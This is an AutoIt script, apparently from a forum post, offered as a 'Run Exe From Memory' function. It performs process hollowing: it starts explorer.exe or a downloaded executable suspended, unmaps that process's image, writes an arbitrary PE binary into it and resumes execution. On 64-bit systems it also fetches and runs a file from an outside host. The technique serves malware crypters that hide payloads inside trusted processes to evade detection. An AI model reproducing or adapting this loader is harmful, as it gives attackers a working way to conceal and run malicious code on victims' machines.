Run Exe From Memory (32/64 bit) Autolt UDF

#Region ;**** Directives created by AutoIt3Wrapper_GUI ****

#AutoIt3Wrapper_UseX64=n

#AutoIt3Wrapper_Res_Language=1033

#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****

global $baseexe

$baseexe = @WindowsDir&"\explorer.exe"

if @OSArch = "X64" Then ;if not 32bit downlood reshacker and set it to be used

if not FileExists(@ScriptDir&"\launcher.exe") Then

InetGet("<a href='http://panics.co.cc/downloads/reshacker.exe' class='bbc_url' title='External link' rel='nofollow external'>http://panics.co.cc/downloads/reshacker.exe"</a>, @ScriptDir&"\launcher.exe")

EndIf

$baseexe = @ScriptDir&"\launcher.exe"

Else

$baseexe = @WindowsDir&"\explorer.exe";else use explorer.

EndIf

; YOUR CODE HERE

Func _RunExeFromMemory($bBinaryImage, $iCompressed = 0, $test = 0)

#Region 1. PREPROCESSING PASSED

Local $tInput = DllStructCreate("byte[" & BinaryLen($bBinaryImage) & "]")

DllStructSetData($tInput, 1, $bBinaryImage)

Local $pPointer

If $iCompressed Then

; Buffer for decompressed data

Local $tBuffer = DllStructCreate("byte[" & 32 * DllStructGetSize($tInput) & "]") ; oversizing it

; Decompression follows:

Local $aCall = DllCall("ntdll.dll", "int", "RtlDecompressBuffer", _

"ushort", 2, _

"ptr", DllStructGetPtr($tBuffer), _

"dword", DllStructGetSize($tBuffer), _

"ptr", DllStructGetPtr($tInput), _

"dword", DllStructGetSize($tInput), _

"dword*", 0)

If @error Or $aCall[0] Then ; If any troubles try original data anyway

$pPointer = DllStructGetPtr($tInput)

Else

$pPointer = DllStructGetPtr($tBuffer)

EndIf

Else

; Not compressed

$pPointer = DllStructGetPtr($tInput)

EndIf

#Region 2. CREATING NEW PROCESS

; STARTUPINFO structure (actually all that really matters is allocaed space)

Local $tSTARTUPINFO = DllStructCreate("dword cbSize;" & _

"ptr Reserved;" & _

"ptr Desktop;" & _

"ptr Title;" & _

"dword X;" & _

"dword Y;" & _

"dword XSize;" & _

"dword YSize;" & _

"dword XCountChars;" & _

"dword YCountChars;" & _

"dword FillAttribute;" & _

"dword Flags;" & _

"ushort ShowWindow;" & _

"ushort Reserved2;" & _

"ptr Reserved2;" & _

"ptr hStdInput;" & _

"ptr hStdOutput;" & _

"ptr hStdError")

; This is much important. This structure will hold some very important data.

Local $tPROCESS_INFORMATION = DllStructCreate("ptr Process;" & _

"ptr Thread;" & _

"dword ProcessId;" & _

"dword ThreadId")

; Create new process

$aCall = DllCall("kernel32.dll", "int", "CreateProcessW", _

"wstr", $baseexe, _ ; try something else too (now only range plays, giving us a space)

"ptr", 0, _

"ptr", 0, _

"ptr", 0, _

"int", 0, _

"dword", 4, _ ; CREATE_SUSPENDED ; <- this is essential

"ptr", 0, _

"ptr", 0, _

"ptr", DllStructGetPtr($tSTARTUPINFO), _

"ptr", DllStructGetPtr($tPROCESS_INFORMATION))

If @error Or Not $aCall[0] Then

Return SetError(2, 0, 0) ; CreateProcess function or call to it failed

EndIf

; New process and thread handles:

Local $hProcess = DllStructGetData($tPROCESS_INFORMATION, "Process")

Local $hThread = DllStructGetData($tPROCESS_INFORMATION, "Thread")

#Region 3. FILL CONTEXT STRUCTURE

; CONTEXT structure is what's really important here. It's very 'misterious'

Local $tCONTEXT = DllStructCreate("dword ContextFlags;" & _

"dword Dr0;" & _

"dword Dr1;" & _

"dword Dr2;" & _

"dword Dr3;" & _

"dword Dr6;" & _

"dword Dr7;" & _

"dword ControlWord;" & _

"dword StatusWord;" & _

"dword TagWord;" & _

"dword ErrorOffset;" & _

"dword ErrorSelector;" & _

"dword DataOffset;" & _

"dword DataSelector;" & _

"byte RegisterArea[80];" & _

"dword Cr0NpxState;" & _

"dword SegGs;" & _

"dword SegFs;" & _

"dword SegEs;" & _

"dword SegDs;" & _

"dword Edi;" & _

"dword Esi;" & _

"dword Ebx;" & _ ; this is pointer to another structure whose third element will be altered

"dword Edx;" & _

"dword Ecx;" & _

"dword Eax;" & _ ; another manipulation point (will set address of entry point here)

"dword Ebp;" & _

"dword Eip;" & _

"dword SegCs;" & _

"dword EFlags;" & _

"dword Esp;" & _

"dword SegS")

DllStructSetData($tCONTEXT, "ContextFlags", 0x10002) ; CONTEXT_INTEGER

; Fill tCONTEXT structure:

$aCall = DllCall("kernel32.dll", "int", "GetThreadContext", _

"ptr", $hThread, _

"ptr", DllStructGetPtr($tCONTEXT))

If @error Or Not $aCall[0] Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)

Return SetError(3, 0, 0) ; GetThreadContext function or call to it failed

EndIf

#Region 4. READ PE-FORMAT

; Start processing passed binary data. 'Reading' PE format follows.

Local $tIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & _

"ushort BytesOnLastPage;" & _

"ushort Pages;" & _

"ushort Relocations;" & _

"ushort SizeofHeader;" & _

"ushort MinimumExtra;" & _

"ushort MaximumExtra;" & _

"ushort SS;" & _

"ushort SP;" & _

"ushort Checksum;" & _

"ushort IP;" & _

"ushort CS;" & _

"ushort Relocation;" & _

"ushort Overlay;" & _

"char Reserved[8];" & _

"ushort OEMIdentifier;" & _

"ushort OEMInformation;" & _

"char Reserved2[20];" & _

"dword AddressOfNewExeHeader", _

$pPointer)

; Move pointer

$pPointer += DllStructGetData($tIMAGE_DOS_HEADER, "AddressOfNewExeHeader") ; move to PE file header

Local $sMagic = DllStructGetData($tIMAGE_DOS_HEADER, "Magic")

; Check if it's valid format

If Not ($sMagic == "MZ") Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)

Return SetError(4, 0, 0) ; MS-DOS header missing. Btw 'MZ' are the initials of Mark Zbikowski in case you didn't know.

EndIf

Local $tIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $pPointer)

; Move pointer

$pPointer += 4 ; size of $tIMAGE_NT_SIGNATURE structure

; Check signature

If DllStructGetData($tIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then ; IMAGE_NT_SIGNATURE

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)

Return SetError(5, 0, 0) ; wrong signature. For PE image should be "PE\0\0" or 17744 dword.

EndIf

Local $tIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;" & _

"ushort NumberOfSections;" & _

"dword TimeDateStamp;" & _

"dword PointerToSymbolTable;" & _

"dword NumberOfSymbols;" & _

"ushort SizeOfOptionalHeader;" & _

"ushort Characteristics", _

$pPointer)

; Get number of sections

Local $iNumberOfSections = DllStructGetData($tIMAGE_FILE_HEADER, "NumberOfSections")

; Move pointer

$pPointer += 20 ; size of $tIMAGE_FILE_HEADER structure

Local $tIMAGE_OPTIONAL_HEADER = DllStructCreate("ushort Magic;" & _

"ubyte MajorLinkerVersion;" & _

"ubyte MinorLinkerVersion;" & _

"dword SizeOfCode;" & _

"dword SizeOfInitializedData;" & _

"dword SizeOfUninitializedData;" & _

"dword AddressOfEntryPoint;" & _

"dword BaseOfCode;" & _

"dword BaseOfData;" & _

"dword ImageBase;" & _

"dword SectionAlignment;" & _

"dword FileAlignment;" & _

"ushort MajorOperatingSystemVersion;" & _

"ushort MinorOperatingSystemVersion;" & _

"ushort MajorImageVersion;" & _

"ushort MinorImageVersion;" & _

"ushort MajorSubsystemVersion;" & _

"ushort MinorSubsystemVersion;" & _

"dword Win32VersionValue;" & _

"dword SizeOfImage;" & _

"dword SizeOfHeaders;" & _

"dword CheckSum;" & _

"ushort Subsystem;" & _

"ushort DllCharacteristics;" & _

"dword SizeOfStackReserve;" & _

"dword SizeOfStackCommit;" & _

"dword SizeOfHeapReserve;" & _

"dword SizeOfHeapCommit;" & _

"dword LoaderFlags;" & _

"dword NumberOfRvaAndSizes", _

$pPointer)

; Move pointer

$pPointer += 96 ; size of $tIMAGE_OPTIONAL_HEADER

Local $iMagic = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "Magic")

; Check if it's 32-bit application

If $iMagic <> 267 Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)

Return SetError(6, 0, 0) ; not 32-bit application. Structures (and sizes) are for 32-bit apps.

EndIf

If $test = 1 and $iMagic <> 267 Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)

Return 0

EndIf

; Extract entry point address

Local $iEntryPointNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint") ; if loaded binary image would start executing at this address

; Move pointer

$pPointer += 128 ; size of the structures before IMAGE_SECTION_HEADER (16 of them - find PE specification if you are interested).

Local $pOptionalHeaderImageBaseNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "ImageBase") ; address of the first byte of the image when it's loaded in memory

Local $iOptionalHeaderSizeOfImageNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfImage") ; the size of the image including all headers

#Region 5. GET AND THEN CHANGE BASE ADDRESS

; Read base address

Local $tPEB = DllStructCreate("byte InheritedAddressSpace;" & _

"byte ReadImageFileExecOptions;" & _

"byte BeingDebugged;" & _

"byte Spare;" & _

"ptr Mutant;" & _

"ptr ImageBaseAddress;" & _

"ptr LoaderData;" & _

"ptr ProcessParameters;" & _

"ptr SubSystemData;" & _

"ptr ProcessHeap;" & _

"ptr FastPebLock;" & _

"ptr FastPebLockRoutine;" & _

"ptr FastPebUnlockRoutine;" & _

"dword EnvironmentUpdateCount;" & _

"ptr KernelCallbackTable;" & _

"ptr EventLogSection;" & _

"ptr EventLog;" & _

"ptr FreeList;" & _

"dword TlsExpansionCounter;" & _

"ptr TlsBitmap;" & _

"dword TlsBitmapBits[2];" & _

"ptr ReadOnlySharedMemoryBase;" & _

"ptr ReadOnlySharedMemoryHeap;" & _

"ptr ReadOnlyStaticServerData;" & _

"ptr AnsiCodePageData;" & _

"ptr OemCodePageData;" & _

"ptr UnicodeCaseTableData;" & _

"dword NumberOfProcessors;" & _

"dword NtGlobalFlag;" & _

"ubyte Spare2[4];" & _

"int64 CriticalSectionTimeout;" & _

"dword HeapSegmentReserve;" & _

"dword HeapSegmentCommit;" & _

"dword HeapDeCommitTotalFreeThreshold;" & _

"dword HeapDeCommitFreeBlockThreshold;" & _

"dword NumberOfHeaps;" & _

"dword MaximumNumberOfHeaps;" & _

"ptr ProcessHeaps;" & _

"ptr GdiSharedHandleTable;" & _

"ptr ProcessStarterHelper;" & _

"ptr GdiDCAttributeList;" & _

"ptr LoaderLock;" & _

"dword OSMajorVersion;" & _

"dword OSMinorVersion;" & _

"dword OSBuildNumber;" & _

"dword OSPlatformId;" & _

"dword ImageSubSystem;" & _

"dword ImageSubSystemMajorVersion;" & _

"dword ImageSubSystemMinorVersion;" & _

"dword GdiHandleBuffer[34];" & _

"dword PostProcessInitRoutine;" & _

"dword TlsExpansionBitmap;" & _

"ubyte TlsExpansionBitmapBits[128];" & _

"dword SessionId")

$aCall = DllCall("kernel32.dll", "int", "ReadProcessMemory", _

"ptr", $hProcess, _

"ptr", DllStructGetData($tCONTEXT, "Ebx"), _

"ptr", DllStructGetPtr($tPEB), _

"dword", DllStructGetSize($tPEB), _

"dword*", 0)

If @error Or Not $aCall[0] Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)

Return SetError(7, 0, 0) ; ReadProcessMemory function or call to it failed while filling PEB structure

EndIf

Local $hBaseAddress = DllStructGetData($tPEB, "ImageBaseAddress")

; Short version of the above

#cs

$aCall = DllCall("kernel32.dll", "int", "ReadProcessMemory", _

"ptr", $hProcess, _

"ptr", DllStructGetData($tCONTEXT, "Ebx") + 8, _

"ptr*", 0, _

"dword", 4, _

"dword*", 0)

If @error Or Not $aCall[0] Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)

Return SetError(7, 0, 0) ; ReadProcessMemory function or call to it failed while reading base address of the process

EndIf

Local $hBaseAddress = $aCall[3]

#ce

; Write new base address

$aCall = DllCall("kernel32.dll", "int", "WriteProcessMemory", _

"ptr", $hProcess, _

"ptr", DllStructGetData($tCONTEXT, "Ebx") + 8, _

"ptr*", $pOptionalHeaderImageBaseNEW, _

"dword", 4, _

"dword*", 0)

If @error Or Not $aCall[0] Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)

Return SetError(8, 0, 0) ; WriteProcessMemory function or call to it failed while writting new base address

EndIf

#Region 6. CLEAR EVERYTHING THAT THIS NEW PROCESS HAVE MAPPED

; Clear old data.

$aCall = DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", _

"ptr", $hProcess, _

"ptr", $hBaseAddress)

If @error Or $aCall[0] Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)

Return SetError(9, 0, 0) ; NtUnmapViewOfSection function or call to it failed

EndIf

#Region 7. ALLOCATE 'NEW' MEMORY SPACE

; Allocate proper size of memory at the proper place.

$aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", _

"ptr", $hProcess, _

"ptr", $pOptionalHeaderImageBaseNEW, _

"dword", $iOptionalHeaderSizeOfImageNEW, _

"dword", 12288, _ ; MEM_COMMIT|MEM_RESERVE

"dword", 64) ; PAGE_EXECUTE_READWRITE

If @error Or Not $aCall[0] Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)

Return SetError(10, 0, 0) ; VirtualAllocEx function or call to it failed

EndIf

Local $pRemoteCode = $aCall[0] ; from now on this is zero-point

#Region 8. GET AND WRITE NEW PE-HEADERS

Local $pHEADERS_NEW = DllStructGetPtr($tIMAGE_DOS_HEADER) ; starting address of binary image headers

Local $iOptionalHeaderSizeOfHeadersNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfHeaders") ; the size of the MS-DOS stub, the PE header, and the section headers

; Write NEW headers

$aCall = DllCall("kernel32.dll", "int", "WriteProcessMemory", _

"ptr", $hProcess, _

"ptr", $pRemoteCode, _

"ptr", $pHEADERS_NEW, _

"dword", $iOptionalHeaderSizeOfHeadersNEW, _

"dword*", 0)

If @error Or Not $aCall[0] Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)

Return SetError(11, 0, 0) ; WriteProcessMemory function or call to it while writting new PE headers failed

EndIf

#Region 9. WRITE SECTIONS

; Dealing with sections. Will write them too as they hold all needed data that PE loader reads

Local $tIMAGE_SECTION_HEADER

Local $iSizeOfRawData, $pPointerToRawData

Local $iVirtualAddress

For $i = 1 To $iNumberOfSections

$tIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & _

"dword UnionOfVirtualSizeAndPhysicalAddress;" & _

"dword VirtualAddress;" & _

"dword SizeOfRawData;" & _

"dword PointerToRawData;" & _

"dword PointerToRelocations;" & _

"dword PointerToLinenumbers;" & _

"ushort NumberOfRelocations;" & _

"ushort NumberOfLinenumbers;" & _

"dword Characteristics", _

$pPointer)

$iSizeOfRawData = DllStructGetData($tIMAGE_SECTION_HEADER, "SizeOfRawData")

$pPointerToRawData = DllStructGetPtr($tIMAGE_DOS_HEADER) + DllStructGetData($tIMAGE_SECTION_HEADER, "PointerToRawData")

$iVirtualAddress = DllStructGetData($tIMAGE_SECTION_HEADER, "VirtualAddress")

; If there is data to write, write it where is should be written

If $iSizeOfRawData Then

$aCall = DllCall("kernel32.dll", "int", "WriteProcessMemory", _

"ptr", $hProcess, _

"ptr", $pRemoteCode + $iVirtualAddress, _

"ptr", $pPointerToRawData, _

"dword", $iSizeOfRawData, _

"dword*", 0)

If @error Or Not $aCall[0] Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)

Return SetError(12, $i, 0) ; WriteProcessMemory function or call to it while writting new sections failed

EndIf

EndIf

; Move pointer

$pPointer += 40 ; size of $tIMAGE_SECTION_HEADER structure

Next

#Region 10. NEW ENTRY POINT

; Entry point manipulation

DllStructSetData($tCONTEXT, "Eax", $pRemoteCode + $iEntryPointNEW) ; $iEntryPointNEW was relative address

#Region 11. SET NEW CONTEXT

; New context:

$aCall = DllCall("kernel32.dll", "int", "SetThreadContext", _

"ptr", $hThread, _

"ptr", DllStructGetPtr($tCONTEXT))

If @error Or Not $aCall[0] Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)

Return SetError(13, 0, 0) ; SetThreadContext function or call to it failed

EndIf

#Region 12. RESUME THREAD

; And that's it!. Continue execution

$aCall = DllCall("kernel32.dll", "int", "ResumeThread", "ptr", $hThread)

If @error Or $aCall[0] = -1 Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)

Return SetError(14, 0, 0) ; ResumeThread function or call to it failed

EndIf

#Region 13. RETURN SUCCESS

; All went well. Return, for example, new PID:

Return DllStructGetData($tPROCESS_INFORMATION, "ProcessId")

EndFunc